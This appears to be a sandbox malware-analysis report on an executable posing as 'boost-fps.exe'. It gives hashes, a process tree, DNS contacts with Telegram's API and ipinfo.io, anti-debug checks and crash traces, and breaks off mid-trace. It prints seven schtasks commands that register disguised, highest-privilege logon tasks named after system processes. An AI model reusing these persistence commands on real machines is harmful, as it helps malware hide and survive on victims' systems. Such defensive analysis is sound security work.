Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 2, 2021, 10:37 a.m.	April 2, 2021, 10:57 a.m.

Size	1.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`92fc1129af30ba08a79113624f51bcb7`
SHA256	`121dec5bd279daf16e683e472949a269bb9751d6ceae4274875e36abe8871946`
CRC32	`2E88F181`
ssdeep	`24576:jqdFcIwibzJkg650JzPsWH3y6F1d+4/ARKWN8+gwSLUS3cU5HYnYzN:jmJpPHy6fdz41NFg5LUSJpYnYB`
Yara	PE_Header_Zero - PE File Signature Zero

boost-fps.exe "C:\Users\test22\AppData\Local\Temp\boost-fps.exe"
5096
- boost-fps.exe "{path}"
  8104
  - schtasks.exe "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f
    8300
  - schtasks.exe "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f
    1892
  - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f
    8636
  - schtasks.exe "schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f
    3456
  - schtasks.exe "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f
    9112
  - schtasks.exe "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f
    3932
  - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f
    4168
  - pw.exe "C:\ProgramData\바탕 화면\pw.exe"
    6636
    - pw.exe "{path}"
      448

Name	Response	Post-Analysis Lookup
cc58476.tmweb.ru	A 92.53.96.245	92.53.96.245
ipinfo.io	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.36.21
api.telegram.org	A 149.154.167.220	149.154.167.220

IP Address	Status	Action
149.154.167.220	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
216.239.36.21	Active	Moloch
92.53.96.245	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (33 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 2, 2021, 10:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 2, 2021, 10:37 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:37 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:55 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:55 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:55 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:55 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:56 a.m.			0	0
IsDebuggerPresent April 2, 2021, 10:56 a.m.			0	0

Command line console output was observed (7 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "SearchProtocolHost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "Idle" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "thunderbird" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "winlogon" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "csrss" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 2, 2021, 10:55 a.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 2, 2021, 10:37 a.m.		1	1	0

One or more processes crashed (19 events)

Time & API	Arguments	Status
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58cd1af 0x58c05a2 0x5ecee4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 48 89 45 ec 33 d2 89 55 e4 90 e9 8f 00 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58c9d7d registers.esp: 107015156 registers.edi: 107015324 registers.eax: 0 registers.ebp: 107015388 registers.edx: 0 registers.ebx: 38596256 registers.esi: 39460428 registers.ecx: 39460428	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c4078 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d0 1e 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cec61 registers.esp: 123006624 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c4078 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 5d 1e 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cecd4 registers.esp: 123002228 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c40b4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 98 1d 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58ced99 registers.esp: 123006624 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39740524 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c40b4 mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 25 1d 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cee0c registers.esp: 123002228 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39740524 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c40ff mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 60 1c 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58ceed1 registers.esp: 123006624 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39741348 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58c40ff mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 ed 1b 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cef44 registers.esp: 123002228 registers.edi: 123006688 registers.eax: 0 registers.ebp: 123006696 registers.edx: 39741348 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58ceff5 0x58c413b mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 60 1c 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58ceed1 registers.esp: 123006508 registers.edi: 123006572 registers.eax: 0 registers.ebp: 123006580 registers.edx: 39741348 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58ceff5 0x58c413b mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 ed 1b 55 5f 89 45 bc 8b 55 bc b9 b0 af exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cef44 registers.esp: 123002108 registers.edi: 123006572 registers.eax: 0 registers.ebp: 123006580 registers.edx: 39741348 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58cf003 0x58c413b mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6f577e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6f50c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x6f5a0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6f61a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d0 1e 55 5f 89 45 c8 83 7d c8 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x58cec61 registers.esp: 123006508 registers.edi: 123006572 registers.eax: 0 registers.ebp: 123006580 registers.edx: 39284804 registers.ebx: 38561312 registers.esi: 40869520 registers.ecx: 0	1
__exception__ April 2, 2021, 10:56 a.m.	stacktrace: 0x58cf003 0x58c413b mscorlib+0x30c9ff @ 0x64ebc9ff mscorlib+0x302367 @ 0x64eb2367 mscorlib+0x3022a6 @ 0x64eb22a6 mscorlib+0x302261 @ 0x64eb2261 mscorlib+0x30ca7c @ 0x64ebca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6f512e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x6f5a07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6f577d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6f577dbb LogHelp_TerminateOnAssert+0x9348 